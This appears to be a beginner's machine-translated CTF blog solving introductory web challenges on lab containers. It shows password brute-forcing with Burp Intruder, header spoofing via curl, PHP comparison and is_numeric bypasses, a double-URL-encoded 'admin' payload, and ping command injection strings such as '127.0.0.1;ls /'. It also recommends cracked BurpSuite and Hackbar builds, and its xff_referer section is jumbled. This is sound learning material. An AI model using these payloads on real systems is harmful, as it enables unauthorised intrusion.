Foreword:
Heaven moves in a healthy direction, and a gentleman strives to constantly strive for self-improvement.
The terrain is good, and a gentleman carries his wealth with kindness.
————"Book of Changes"
I first came into contact with CTF relatively late, nearly halfway through the semester, and my first question was in the world of attack and defense. The questions here are suitable for newcomers who are new to it. I write this blog to commemorate it.
front page
Table of contents:
To be continued…
View_source
There are four methods:
The first one: Next Firefox browser (it will be more convenient to use BurpSuite, Hackbar and other tools in the future), press F12 and it will appear at the bottom of the page source code.
The second method: add "view-source:" (content within double quotes) in front of the url, and press Enter to display the source code page.
The third method is to right-click and find View Source Code (Ctrl+U). Click to see the web page code. But this question says that you can’t right-click, and even if you try, it won’t work, so this method is no longer needed.
The fourth method: Open the command line window (Win+R first, then enter cmd, and press Enter to enter), enter [curl http://61.147.171.105:62119/] (Chinese The command is in brackets [], followed by the address of your own container (you need to copy your own and paste it) to get the flag
robots
First understand the robots protocol: Robots protocol is used to tell search engines which pages can be crawled and which pages cannot be crawled;
When you see that the page is blank, the name of the question It is a prompt, add /robots.txt (http://61.147.171.105:59224/robots.txt) after the URL,
to get the prompt, then visit the url/f1ag_1s_h3re.php and get the flag .
Generally, this kind of access will not directly output the flag, but will only appear after viewing the source code. There are also some means of accessing file content, such as file upload, command execution, etc.
backup
Return to home page
The bak file is a backup file on the web page (backup: backup). The question directly asked "Do you know the backup file name of index.php?", the answer was: "Yes, it is index.php.bak." After accessing it, I got a download Open the file with Notepad to get the flag.
cookie
Return to home page
First, find the existence of the cookie.php file in Storage->Cookie through the prompt. Visit (http://61.147.171.105:62539/cookie.php) to get the next prompt - view http response
There are three methods next:
- the first method:
Required tools: Firefox, BurpSuite
Tool learning: (You need to search for: BurpSuite installation and configuration tutorial< a i=3>, BurpSuite cracking tutorial, BurpSuite packet capture configuration, BurpSuite sends packages,BurpSuite captures localhost packages, and there is also a high-quality article Articles) (Note: These four articles may not be what I found at the time, so they may fail. If the attempt fails, it is recommended to search for other articles or blogs. Private message me, the summary idea is to download jdk and configure the Java environment, download BurpSuite and place it in the appropriate directory, download the two cracked jar files and place them in the first directory of BurpSuite --> Crack BurpSuite --> Packet capture configuration, later I also encountered two problems. One is that the jdk needs to be updated to jdk18. The other is the configuration of the bat startup file. The original one using github is no longer valid and an error will be reported. After unremitting search, I found a solution. If you need help, please contact me) < /span>
Note that after configuring manual proxy in Firefox, remember to change it back, otherwise you will not be able to access the website.
- Second method:
Idea: Use Curl command
Execute in the command line window [curl -I http://61.147.171.105: 62539/cookie.php], get the flag
The third method:
The blogger of this blog directly Check the response in NetWork, but I found an error (NotFound) after searching, which doesn't seem feasible.
It is recommended to use the first method. There are no shortcuts in learning network security and you need to be down-to-earth. If you don’t accumulate steps, you won’t be able to reach a thousand miles; if you don’t accumulate small streams, you won’t be able to reach a river or sea.
disabled_button
Return to home page
Delete disabled and press F5 to refresh, and the flag can be clicked. Now that I can understand the technology a little bit, a button function is implemented in JavaScript code.
weak-auth
Return to home page
The test is about password and account blasting. You can find several dictionaries on the Internet, https://www.somd5.com/download/dict/, (well, the ones here are useless for this question). I tried it a few times first. . . The first step is send to Intruder
The second step is to select the blasting method and blasting point (enclosed in §§)
The third step is to go to the payloads setting dictionary, that is, the blasting content
After setting the username and then setting the password, it is almost the same
The fourth step, during the blast, we have already received the prompt - Please login as admin (in fact, just enter a few letters from the beginning Yes)
Now the password is just wrong, so go back and change username=admin, then use the Sniper method, and then go to payloads to set the blasting content
The last step is to constantly change the dictionary (because the previous password from 10000 to 100000 could not be used, so I changed the dictionary), and the result was a flag!
simple_php
Return to home page
Tools used: Firefox browser, Hackbar
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];//通过GET方法传入a的值
$b=@$_GET['b'];//通过GET方法传入b的值
//'=='弱比较,即null,0x,0a这些都会被认为'=='0,
//而这里直接传入a=0的话,and表示逻辑与,a=0被认定为false就不能通过if的判断
if($a==0 and $a){
echo $flag1;
}
//is_numeric()函数绕过,可以使用数组绕过,字母绕过,编码绕过,可以去搜一些文章学习php is_numeric()函数绕过
//b[]=1235,b=1235a,b=1235%1,b=1235>1,这些都能绕过
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?>
You also need to learn about GET and POST parameter transfer. The form of GET parameter transfer is to add {/?Parameter name 1=&Parameter name 2=} (content inside curly brackets) directly after the URL, such as this question , {http://61.147.171.105:56165/?a=0a&b=1235%1}, so that you can pass in the parameters and get the flag.
POST parameter transfer requires the use of the tool Hackbar. Hackbar installation configuration:
Path 1: Hackbar solves the certificate charging problem (professional level): Firefox-Hackbar-2.2.9-Learning Edition-Jiangnan Xiaochongchong’s Blog (fengwenhua.top)
Method 2: Hackbar installation, directly download the zip package, and then Add xpi attachment to the plug-in: https://github.com/Mr-xn/hackbar2.1.3
(I seem to be using the second way to get it, but remember to cancel Hackbar Updates, otherwise you will be required to register again)
get_post
Return to home page
Tools used: Firefox, HackbarUse Hackbar to perform GET parameter transfer and POST parameter transfer. I believe you are smart and have passed these.Article 1, a>Article 2, Article 3 learned. (Articles 2 and 3 are slightly expanded)
We use BurpSuite to pass parameters here
The first step is to capture the packet and send to repeater
The question has prompted us to use the GET method to pass in a variable named a with a value of 1. We add {?a=1} here marked by the arrow, which means that it is passed in by GET and the new value is obtained. Tip - then use the POST method to pass in a variable named b with a value of 2
In the second step, POST into b
and first change the upper left corner Change GET to POST, then enter b=2 in the line separated by one line, and then click Send to send, but the flag does not appear, which is also strange here.
I don’t believe in evil, so I go back to Firefox, first pass in a=1, b=2 in advance, and then click execute. At this time, when intercepted by bp, the parameter name will appear, and then Send to repeater, send again, and find that flag
appears. After comparison, it is found that the former lacks some information and has no Content-type. When Content-type files are included, the type needs to be changed, such as changing it to text/plain; or changing it to image/jpg;. This allows code and images to be passed in, bypassing the front end.
It is recommended that when you encounter questions that require parameters to be passed in get or post, you can first pass the parameters in the hackbar, and then click the packet to be captured by bp. Templates and the like will appear, which avoids the need to add them manually. If the parameter name appears like this, you only need to modify the parameter content.
xff_referer
Return to home page
Tools used: Firefox, BurpSuite
First open the environment and tell us directly that "the ip address must be 123.123.123.123", so we need to forge the ip address,
Method 2: Use Hackbar to add head.
First click LoadURL, and rows of request headers will appear. Then fill in the Add Header. A row will appear below, in which enter {X-Forwarded-For: 123.123.123.123} (curly brackets "{}" content inside), (note that ':' and the following address must be left blank. I don’t understand the specific principle... but you can take a look at some ways to fake IP:Blog 1< /span>Website two ( Tencent Cloud), Website one (blog) Learning curl command website: Method 3: Use the curl command in the command line window to obtain the flag. After getting the prompt, modify the Referer and get the flag. Capture packet——>Send to repeater, add {X-Forwarded-For: 123.123.123.123} in the middle of the request packet. (Note here that it is in the middle. If added in the bottom line, it will not work) Method 1: Forge request headers in BurpSuite.
Then a prompt appears - "Must come from https://www.google.com", which implies that we need to forge the Referer request header, in Hackbar Add Referer with the content {https:www.google.com}, press execute, and get the flag. )
Get Referer prompt
curl http://61.147.171.105:64406/ -H "X-Forwarded-For: 123.123.123.123"
get flag
curl http://61.147.171.105:64406/ -H "X-Forwarded-For: 123.123.123.123" --referer "https://www.google.com"
Expand learning articles:
https://www.freebuf.com/articles/database/269712.html
Share a favorite poem
ˆ ˆ ˆ ˆ ˆ ˆ ˆ ˆ "Five Thoughts on Lisi, No. 4"
ˆ ˆ ˆ ˆ ˆ ˆ ˆ ˜ Difficult to be water, except Wushan, it is not cloud. I look back lazily at the flowers, half destined to practice Taoism and half destined to be a king.
command_execution
Return to home page
First recommend a few articles to learn about ping command execution vulnerabilities:Article 1, Article 2< /span> First execute {127.0.0.1;ls /}, that is, check the file name in the root directory, (This question does not have any filtering. If you encounter other filtered questions in the future, you can read the above articles to learn. If you have recommended articles, please leave a comment and learn together^ _ ^) Execute the command {127.0.0.1;tac /home/flag.txt} and view the source code to get flag. Then, try one by one (ping is too slow, I don’t know if there are other methods). For example, if you want to check the file name in the usr directory, {127.0.0.1;ls /usr -al }, finally kept trying, and finally found a flag.txt file under /home (I don’t know much about these,,,, let’s learn from what the big guys write)Article 4, Article 3,
simple_js
(There is a problem with the environment temporarily and it cannot be opened...
The blogger is currently configuring JavaScript and is handily studying JavaScript. I hope to provide a good problem-solving process for all the comrades who support it. For the time being, let’s read this blogger’s article. If it’s helpful, don’t forget to give this blogger a like...(* ̄0 ̄ )ノ)
Return to home page
php2
Return to home page
Tools used: Firefox, Edgeworth, HackbarYujian (the one I currently use, I found it by readingthis blog. The quantity is huge. It is recommended to use other directory scanning tools, such as wscan, dirsearch, etc.):
Link: https://pan.baidu.com/s/1Bn7GtWb7AStcjzVahFOjSQ
Extraction code: zkaq
(After downloading and decompressing, a compressed package of Yujian background scanning tool .exe and Yujian configuration file will come out, and then decompress this compressed package. Then open Yujian background scanning tool.exe and enter a URL ( Take Baidu as an example: www.baidu.com) Click to start scanning, and then cancel the scan. Return to the Yujian background scanning tool.exe folder and you will find an additional folder called configuration file. The various .TXTs extracted from the configuration file are copied to the folder of the new configuration file.
Then close the Yujian background scanning tool .exe and reopen it to normal used)
First open the environment and read the prompt "Can you anthenticate to this website?". After reading for a long time, I didn't understand what it meant. I tried scanning with Yujian and found the /index.phps directory. Note that the general Yujian scan is If not, you need to add the dictionary yourself. The method of adding is very easy. There are many txt files in the files directory of Yujian. You can also create a new one or add "/index.phps" directly in it, so that you can scan them.
Then visit /index.phps, where you need to view the source code to see the complete source code.
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
//对传入的参数id进行第二次url解码,第一次url解码浏览器帮我们自动完成了
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
//这里就是输出flag的地方,但并未看到明显的flag文件,看上去就是仅仅输出xxxxxxx
}
?>
Through analysis, we need to pass in a parameter id through GET, so that it is equal to admin, not exactly equal to admin, which is a weak comparison, so we construct the payload: {?id=%2561dmin}, (%25——%, %61——a , %2561 gets %61 after one decoding, and the second url decoding is 'a'), and gets the flag!
//Due to many academic tasks, updates may be suspended for a while.